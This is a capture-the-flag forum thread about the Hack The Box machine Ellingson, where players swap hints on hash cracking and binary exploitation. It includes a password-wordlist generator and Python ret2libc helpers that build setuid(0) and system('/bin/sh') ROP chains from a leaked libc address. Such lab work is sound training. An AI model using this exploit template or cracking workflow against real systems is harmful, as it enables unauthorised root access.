Ellingson

Spoiler Removed

rooted &&

@sazouki said:

@maxo13 said:

One more question, as someone mentioned before:

How many hashes out of 4 are we expected to crack?
I cracked two (one with a password that didn't work and a second that worked) and gained access to user m***. What about the other hashes?

Edit: that one more password is enough. So you need to crack 2, where 1 should be a quite strong password.

Are those hashes related to fa2b? Because those are the only 4 hashes I found.

I have the same question, can anyone give me a little PM?

Could anyone please nudge me (pm is ok too ofc) with the initial step? I found the traceback and I’m fairly familiar with the web backend used but I can’t seem to make anything out of it at all (SSTI doesn’t work)

@rowra said:

Could anyone please nudge me (pm is ok too ofc) with the initial step? I found the traceback and I’m fairly familiar with the web backend used but I can’t seem to make anything out of it at all (SSTI doesn’t work)

Got in as h** but cannot proceed. Found some backups but they’re useless I guess. Nudge if possible please

Got user, on to binary exploitation as a total noob, following/learning from the ippsec video. I try to recvuntil pa****** but it doesn't work, it just hangs there (not receiving anything). I believe it's because (unlike bitterman from ippsec) the control given/input read is on the same line, with no newline at the end/just before the input. I can't seem to parameterize it the proper way. Any help please?

Finally, rooted.

The EOF error has made me wanna cry :) A big thank you goes to AzAxIaL and rowra for assistance with the final step. You guys rock.

How is it possible that my exploit worked locally once and now it doesn't? I have disabled A*** too. New to binex btw. Would appreciate any kind of nudge.

Edit: Rooted!!! What an amazing box. I was working on it for 2 weeks and I've learned a ton about binex. Huge thanks to @adelmatrash for the nudges.

Rooted, but I’ve only gotten the shell after trying another method of attack, and I would love to know if someone knows why my first attempt didn’t work.

1st attempt: l----d puts a-----s, calculated the l–c o----t to bypass a–r (I didn’t forget to make the same calculation on the remote too), then called s----d and s----m with /—/–

Although this worked locally, it failed on the remote and gave segfaults.

2nd attempt: nearly the same but instead of calling the functions directly I’ve o—w------ the G-- and used defined P–s, this one worked and I’ve gotten the root shell.

Can someone explain to me why my first attempt failed? There is no reason I can think of that it should fail.

Also, did anyone manage to get root without l-----g l–c? By only using the P-- functions, or maybe the un–ed_f–c part of the binary?

Thanks!

This was an awesome box. I got user a few weeks ago and then circled back after boning up on binary exploitation specific to Ellingson's architecture. I had a lot of fun and found this to be far easier than Calamity or Jail. Looking for more binary exploitation. If anyone can recommend another box on HTB, I would be much obliged.

@x0xxin said:

This was an awesome box. I got user a few weeks ago and then circled back after boning up on binary exploitation specific to Ellingson's architecture. I had a lot of fun and found this to be far easier than Calamity or Jail. Looking for more binary exploitation. If anyone can recommend another box on HTB, I would be much obliged.

Safe's initial step / user is somewhat similar.

Nice machine. :)

Hint.
User: Be patient when cracking the hash; let the program you chose finish the wordlist.
Root: I lost time on that EOF thing. My mistake was with recv() in that Python library; I was getting a malformed leaked address, nothing that some debugging didn't solve.

I seem unable to crack the hash. I used hashcat with rockyou and exhausted the entire list. I did crack t*******e’s hash but that seems useless for now.

@CWright017 said:

I seem unable to crack the hash. I used hashcat with rockyou and exhausted the entire list. I did crack t*******e’s hash but that seems useless for now.

Read all the pages properly... you will get the hint for a custom password list.
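The reply above, and the later hint about the Plague's memo on passwords, both point at building a custom wordlist around the site's password policy instead of relying on rockyou alone. The Python below is an added example of that, not code from any post here or from the box: it mangles a few base words with case and suffix variants and keeps only candidates that satisfy a policy. The base words, the suffix rules and the policy itself (8+ characters, one uppercase, one digit, one symbol) are placeholders; the real rules have to be read off the target's pages.

```python
# Added example: generate a policy-shaped wordlist for hashcat/john.
# Not from the box or from any post in this thread; the base words, the
# mangling rules and the policy below are assumptions, not Ellingson's.
import string
import sys

SYMBOLS = "!@#$"                      # assumed symbols the policy accepts
DIGIT_SUFFIXES = ("", "1", "12", "123")


def policy_ok(pw, min_len=8):
    """Placeholder policy: min length, one uppercase, one digit, one symbol."""
    return (len(pw) >= min_len
            and any(c.isupper() for c in pw)
            and any(c.isdigit() for c in pw)
            and any(c in string.punctuation for c in pw))


def mangle(word, years=()):
    """Yield case and suffix variants of one base word in a stable order."""
    cases = (word.lower(), word.capitalize(), word.upper())
    suffixes = list(DIGIT_SUFFIXES) + [str(y) for y in years]
    for base in cases:
        for digits in suffixes:
            for sym in ("",) + tuple(SYMBOLS):
                yield base + digits + sym      # e.g. Secret1995!
                yield base + sym + digits      # e.g. Secret!1995


def build_wordlist(base_words, years=(), policy=policy_ok):
    """Mangle every base word; keep unique candidates that pass the policy."""
    seen = {}                                  # dict keeps insertion order
    for word in base_words:
        for cand in mangle(word, years):
            if cand not in seen and policy(cand):
                seen[cand] = None
    return list(seen)


if __name__ == "__main__":
    # Constructed sample base words; take the real ones from the target.
    words = sys.argv[1:] or ["ellingson", "mineral", "gibson"]
    for pw in build_wordlist(words, years=range(1995, 2000)):
        print(pw)
```

Redirect the output to a file and pass it to hashcat or john as the wordlist, with the hash mode matching the hash type you pulled from the box; because the list is small, the cracker finishes quickly, and the "be patient" advice above applies to the full rockyou run rather than to this one.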

Where is everyone finding this password policy? Is it on the website or inside the shell somewhere?

Apologies to all. Looks like I gave away too much last time, so let me try again with less spoilers.

INITIAL FOOTHOLD

  • So many articles. I wonder how many there are?
  • A snake’s REPLy will give you the chance to give your own key.

USER

  • Information kept for emergency recovery will help you not to be afraid of your own s****w
  • Some people still did not follow the Plague’s important memo on passwords!

ROOT

  • A clear reference to the movie. Like Crash Override, keep a copy of the disk.
  • IPPSEC’s bitterman vid is a great starter.
  • Local and Remote will have differences.
  • What other calls can be used to execute commands?

Hopefully this is spoiler-free enough to not be taken down.

As always, PM me here, or on Discord if you need more hints.
Don’t forget to tell me your progress!
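The root hints above, together with the earlier posts about the EOF error, a malformed leaked address from recv(), and a direct setuid/system chain that segfaulted on the remote but not locally, all revolve around the same two-stage ret2libc pattern. The Python below is an added example of the helper logic for that pattern; it is not code from any post here, not the box's binary, and not an exploit for it. Every address and offset in it is a made-up placeholder; the real gadget addresses come from the target binary, and the real libc offsets from the target's own libc (which is what the "keep a copy of the disk" hint is about). Two facts worth keeping in mind, both general rather than specific to this box: a libc that differs between local and remote gives wrong offsets even when the leak is correct, and glibc's system() expects the stack aligned as the ABI guarantees at a call, so a chain that returns into it misaligned segfaults; a spare ret gadget shifts the stack by 8 bytes to fix that.

```python
# Added example: helpers for a two-stage ret2libc chain (leak libc through
# puts, then setuid(0); system("/bin/sh")). Not from the box or any post in
# this thread. Every address and offset below is a made-up placeholder; the
# real ones must come from the target binary and the target's own libc.
import struct

LIBC_LOW, LIBC_HIGH = 0x7F0000000000, 0x800000000000   # usual x86-64 mmap range


def p64(value):
    """Pack a 64-bit little-endian word as it sits on the x86-64 stack."""
    return struct.pack("<Q", value)


def u64(data):
    """Unpack 1..8 little-endian bytes, right-padding a short leak with NULs."""
    if not 0 < len(data) <= 8:
        raise ValueError("expected 1..8 leaked bytes, got %d" % len(data))
    return struct.unpack("<Q", data.ljust(8, b"\0"))[0]


def parse_leak(raw):
    """Turn the raw bytes received after puts(puts@got) into an address.

    puts() stops at the first NUL, and a user-space x86-64 address has two
    zero top bytes, so at most 6 bytes arrive, then the newline puts() adds.
    Reading too much (the next prompt) or too little is the usual cause of a
    'malformed' leak, so cut at the first newline and sanity-check the range.
    Pitfall: an address containing 0x0a is cut short here; rerun for a new one.
    """
    line = raw.split(b"\n", 1)[0]
    addr = u64(line)
    if not LIBC_LOW <= addr < LIBC_HIGH:
        raise ValueError("leak 0x%x is not in the usual libc range" % addr)
    return addr


def libc_base(leaked_puts, puts_offset):
    """Rebase: runtime address minus the symbol's offset in the libc file.

    The offset must come from the target's libc; a different libc version on
    the remote gives a wrong base even though the leak itself is fine.
    """
    base = leaked_puts - puts_offset
    if base & 0xFFF:
        raise ValueError("base 0x%x not page-aligned: wrong libc or bad leak" % base)
    return base


def resolve(base, offsets):
    """Absolute addresses for a dict of {symbol: offset-in-libc-file}."""
    return {name: base + off for name, off in offsets.items()}


def leak_chain(pad, pop_rdi, puts_got, puts_plt, main):
    """Stage 1: overflow, call puts(puts@got), return to main for stage 2."""
    return b"A" * pad + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)


def shell_chain(pad, pop_rdi, setuid, system, binsh, ret=None):
    """Stage 2: setuid(0); system("/bin/sh").

    Each extra 8-byte slot flips the 16-byte stack alignment system() sees.
    Passing a `ret` gadget inserts one such slot; leave it None when the
    stack is already aligned at the point the chain returns into system().
    """
    chain = b"A" * pad + p64(pop_rdi) + p64(0) + p64(setuid)
    if ret is not None:
        chain += p64(ret)
    return chain + p64(pop_rdi) + p64(binsh) + p64(system)


if __name__ == "__main__":
    # Constructed bytes standing in for what recv() returned on the wire.
    raw = p64(0x7F12345E0ED0)[:6] + b"\nnext prompt> "
    leaked = parse_leak(raw)
    base = libc_base(leaked, puts_offset=0x80ED0)          # placeholder offset
    libc = resolve(base, {"system": 0x4F550, "setuid": 0xE5970, "binsh": 0x1B3E1A})
    print("libc base 0x%x, system at 0x%x" % (base, libc["system"]))
```

Wire the two chains into a pwntools script by sending leak_chain first, parsing the reply with parse_leak, rebasing, and then sending shell_chain on the second pass through main; the page-alignment and address-range checks are the cheap way to catch a bad recv() boundary or a mismatched libc before the second stage is sent.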

Ha. Root was fun. pwntools didn’t want to work with the local binary, so I went straight to remote…

PM if you need help with this. Helping others helps me learn.

Got user :)
Thanks @AzAxIaL for nudging me to follow the path, guiding me with questions, and making sure I read everything and really look at what is there. I was kinda blind. In the end, it's quite straightforward to user, basic commands needed, etc.
Spent a long time on the initial connection, purely because I missed the first piece of the required key... again a PEBKAC.
Next challenge: root...

Somehow my john stops working after 2 seconds when trying with rockyou.txt as the wordlist. Does anyone have an idea what the problem is?

@Chr0x6eOs said:

Somehow my john stops working after 2 seconds when trying with rockyou.txt as the wordlist. Does anyone have an idea what the problem is?

I used hashcat.